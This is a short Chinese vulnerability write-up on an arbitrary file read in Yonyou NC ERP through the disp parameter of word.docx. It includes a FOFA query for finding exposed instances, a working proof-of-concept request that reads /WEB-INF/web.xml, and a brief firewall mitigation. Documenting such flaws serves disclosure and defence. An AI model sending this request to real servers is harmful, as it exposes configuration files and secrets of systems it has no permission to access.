用友NC word.docx任意文件读取漏洞

文章目录

产品简介

用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理

漏洞概述

用友NC在word.docx的disp参数存在任意文件读取漏洞

指纹识别

fofa:

python 复制代码
app="用友-UFIDA-NC"

漏洞利用

Poc:

python 复制代码
GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 0

修复建议

临时缓解措施:在应用防火墙上配置 禁止访问word.docx接口策略

【其实吵架从来没有输赢的,或者说都是输。】

相关推荐
IT 古月方源10 小时前
跨站脚本攻击(XSS)详解
运维·服务器·前端·网络·tcp/ip·网络安全·xss
云起无垠10 小时前
第82期 | GPTSecurity周报
人工智能·网络安全
Z3r4y11 小时前
【供应链安全】对了解供应链安全的扫盲
安全·网络安全·供应链安全
大智晚成11 小时前
eNSP之家----ACL实验入门实例详解(Access Control List访问控制列表)(重要重要重要的事说三遍)
运维·服务器·网络·网络协议·tcp/ip·网络安全·智能路由器
(时光煮雨)13 小时前
安全基础-互联网技术基础
网络·安全·网络安全·互联网·网络安全基础
肾透侧视攻城狮14 小时前
基于华为ENSP的OSPF数据报文保姆级别详解(3)
网络·网络协议·网络安全·华为·信息与通信·ospf·dr/bdr
万亿少女的梦16815 小时前
Web应用安全-漏洞扫描器设计与实现
安全·web安全·网络安全·信息安全·网络设计
XDU小迷弟16 小时前
第30天:PHP应用&组件框架&前端模版渲染&三方插件&富文本编辑器&CVE审计
开发语言·前端·网络安全·php
19999er18 小时前
LAMP搭建
网络·笔记·安全·网络安全·云计算